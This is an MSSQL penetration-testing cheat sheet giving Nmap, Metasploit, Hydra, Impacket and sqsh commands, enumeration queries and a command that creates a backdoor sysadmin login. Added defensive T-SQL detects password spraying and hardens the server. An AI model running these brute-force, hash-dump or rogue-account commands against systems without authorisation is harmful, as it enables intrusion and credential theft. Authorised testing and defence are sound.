Ms-SQL 1433
1. Nmap for MSSQL Enumeration:
Search for related Nmap scripts:
nmap --script-help "ms-sql-*"
Run Nmap with selected MSSQL scripts:
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13
Run specific MSSQL scripts:
nmap --script ms-sql-info -p 1433 10.0.0.0
nmap --script ms-sql-config -p 1433 10.0.0.0
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 10.0.0.0
nmap --script ms-sql-* -p 1433 10.0.0.0
2. Metasploit Modules for MSSQL:
Common MSSQL Metasploit modules:
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
These modules allow you to:
Enumerate MSSQL logins and domain accounts.
Dump hashes and retrieve database schema.
3. Bruteforcing MSSQL with Hydra:
Bruteforce with a username list:
hydra -L usernames.txt -p password 10.0.0.0 mssql
Bruteforce with a password list:
hydra -l username -P passwords.txt 10.0.0.0 mssql
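Detecting the spraying above from the server side, as an added example that is not part of the original cheat sheet: the T-SQL below reads the current SQL Server error log with xp_readerrorlog, parses the login name and client address out of each "Login failed for user" line, and groups the failures per client and login for the last hour. It assumes failed-login auditing is on (the default "Failed logins only" setting) and that it runs as sysadmin on an instance you administer; the threshold of 20 failures per hour is an assumed tuning value, not a documented one.

```sql
-- Added detection query (not from the original cheat sheet).
-- xp_readerrorlog returns the columns LogDate, ProcessInfo, Text.
CREATE TABLE #failed_logins (
    LogDate     datetime,
    ProcessInfo nvarchar(50),
    [Text]      nvarchar(max)
);

-- Current error log (0), SQL engine log (1), only lines containing 'Login failed'
INSERT INTO #failed_logins
EXEC xp_readerrorlog 0, 1, N'Login failed';

-- A failed-login line looks like:
--   Login failed for user 'sa'. Reason: Password did not match that for the
--   login provided. [CLIENT: 10.0.0.5]
-- Pull the quoted login name and the address inside "[CLIENT: ...]".
WITH parsed AS (
    SELECT
        LogDate,
        SUBSTRING([Text],
                  CHARINDEX('''', [Text]) + 1,
                  CHARINDEX('''', [Text], CHARINDEX('''', [Text]) + 1)
                      - CHARINDEX('''', [Text]) - 1)              AS login_name,
        SUBSTRING([Text],
                  CHARINDEX('[CLIENT: ', [Text]) + 9,
                  CHARINDEX(']', [Text], CHARINDEX('[CLIENT: ', [Text]))
                      - CHARINDEX('[CLIENT: ', [Text]) - 9)       AS client_addr
    FROM #failed_logins
    WHERE [Text] LIKE 'Login failed for user ''%'
      AND CHARINDEX('[CLIENT: ', [Text]) > 0
)
-- One client hammering one login (-P run) or many logins (-L run) stands out
-- as a high failure count from a single client_addr.
SELECT
    client_addr,
    login_name,
    COUNT(*)     AS failures,
    MIN(LogDate) AS first_seen,
    MAX(LogDate) AS last_seen
FROM parsed
WHERE LogDate >= DATEADD(hour, -1, GETDATE())   -- assumed window: last hour
GROUP BY client_addr, login_name
HAVING COUNT(*) >= 20                            -- assumed threshold
ORDER BY failures DESC;

DROP TABLE #failed_logins;
```

SQL Server applies no lockout to SQL logins on its own; a login created with CHECK_POLICY = ON inherits the Windows account lockout policy, which is the usual mitigation for the -P case alongside restricting who can reach port 1433 at all.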
4. Connecting to MSSQL with Impacket:
SQL Authentication:
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
Windows Authentication:
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth
5. Connecting to MSSQL with sqsh:
Basic connection:
sqsh -S <target-ip> -U username -P password
Connect to a specific database:
sqsh -S <target-ip> -U username -P password -D database
6. SQL Commands for Enumeration:
Get all users:
SELECT * FROM sys.database_principals;
Switch to a specific database:
USE <database>;
List available databases:
SELECT * FROM master.dbo.sysdatabases;
List tables within a database:
SELECT * FROM information_schema.tables;
Get content from a table:
SELECT * FROM <database_name>.dbo.<table_name>;
Get the MSSQL version:
SELECT @@version;
Check permission to execute OS commands:
USE master; EXEC sp_helprotect 'xp_cmdshell';
Get linked servers:
EXEC sp_linkedservers; SELECT * FROM sys.servers;
Create a new user with sysadmin privileges:
CREATE LOGIN tester WITH PASSWORD = 'password'; EXEC sp_addsrvrolemember 'tester', 'sysadmin';
Get the current username:
SELECT user_name();
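The defender's counterpart to the enumeration in sections 1 and 6, as an added example that is not part of the original cheat sheet: one T-SQL audit that checks the things the ms-sql-empty-password and ms-sql-xp-cmdshell scripts and the queries above look for (authentication mode, xp_cmdshell state, blank SQL passwords, sysadmin membership, linked-server credentials), followed by the hardening statements for the two settings that are usually wrong. It assumes it runs as sysadmin on an instance you administer; PWDCOMPARE needs CONTROL SERVER permission.

```sql
-- Added audit script (not from the original cheat sheet).

-- 0. Authentication mode: 1 = Windows authentication only, so SQL logins
--    such as 'sa' cannot be used at all; 0 = mixed mode.
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_auth_only;

-- 1. OS command execution: value_in_use = 1 means xp_cmdshell is enabled.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. SQL logins whose password is blank (what ms-sql-empty-password probes).
SELECT name, is_disabled, is_policy_checked
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;

-- 3. Members of the sysadmin fixed server role. An unexpected login here
--    (for example the 'tester' login created in the command above) is a finding.
SELECT m.name AS member_name, m.type_desc, m.is_disabled
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;

-- 4. Linked servers. A mapping with uses_self_credential = 0 and a remote_name
--    lets anyone who can query this instance reach the remote one as that
--    fixed identity, which is why sp_linkedservers output matters.
SELECT s.name, s.data_source, s.provider, l.remote_name, l.uses_self_credential
FROM sys.servers s
LEFT JOIN sys.linked_logins l ON l.server_id = s.server_id
WHERE s.is_linked = 1;

-- 5. Remediation, to run after reviewing the findings above:
--    turn xp_cmdshell off and disable the built-in sa login.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

ALTER LOGIN sa DISABLE;
```

Queries 0 to 4 only read catalog views and are safe to schedule; step 5 changes configuration and is the state the Nmap scripts above should report afterwards (xp_cmdshell disabled, no blank-password login).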